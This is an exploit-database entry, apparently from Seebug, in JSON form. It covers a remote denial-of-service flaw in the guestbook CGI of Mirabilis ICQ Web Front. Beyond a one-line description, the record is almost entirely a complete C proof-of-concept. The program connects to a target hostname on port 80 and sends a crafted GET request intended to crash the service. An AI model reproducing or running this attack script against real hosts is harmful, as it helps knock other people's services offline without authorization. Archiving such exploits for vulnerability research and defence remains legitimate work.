Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a Remote DoS Attack Vulnerability

2014-07-01T00:00:00

Description

No description provided by source.

{"href": "https://www.seebug.org/vuldb/ssvid-73968", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a Remote DoS Attack Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-73968", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n source: http://www.securityfocus.com/bid/1463/info\r\n\r\nThe guestbook CGI program in ICQ Web Front service for ICQ 2000a, 99b, and others allows remote attackers to cause a denial of service via a URL with a long name parameter.\r\n\r\n/* ICQ Web Front DoS */\r\n\r\n#include <sys/socket.h> \r\n#include <stdio.h> \r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n\r\nvoid main(int argc, char *argv[]) \r\n{ \r\n int sock;\r\n struct in_addr addr; \r\n struct sockaddr_in sin; \r\n struct hostent *he; \r\n unsigned long start; \r\n unsigned long end; \r\n unsigned long counter; \r\n \r\n /* added extra ? to be on the safe side :) */\r\n char xploitstr1[50]="GET /?????????? HTTP/1.0 \\n\\n";\r\n \r\n \r\n printf("ICQ Web Front DoS - author: char0hlz/tPG\\n"); \r\n printf("The Poor Gurus' Network [http://www.tpgn.net]\\n");\r\n\r\n if (argc<2) \r\n { \r\n printf("usage: %s <hostname>\\n", argv[0]); \r\n exit(0); \r\n } \r\n if ((he=gethostbyname(argv[1])) == NULL) \r\n { \r\n herror("gethostbyname"); \r\n exit(0); \r\n } \r\n start=inet_addr(argv[1]); \r\n counter=ntohl(start); \r\n sock=socket(AF_INET,SOCK_STREAM,0); \r\n bcopy(he->h_addr,(char *)&sin.sin_addr, he->h_length); \r\n sin.sin_family=AF_INET; \r\n sin.sin_port=htons(80); \r\n if (connect(sock,(struct sockaddr*)&sin,sizeof(sin))!=0) \r\n { \r\n perror("pr0blemz"); \r\n } \r\n send(sock,xploitstr1,strlen(xploitstr1),0);\r\n close(sock);\r\n \r\n printf("Done. Refresh the page to see if it worked.\\n"); \r\n} \n ", "id": "SSV:73968", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T17:10:27", "reporter": "Root", "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645445731, "score": 1659785532, "epss": 1678850553}}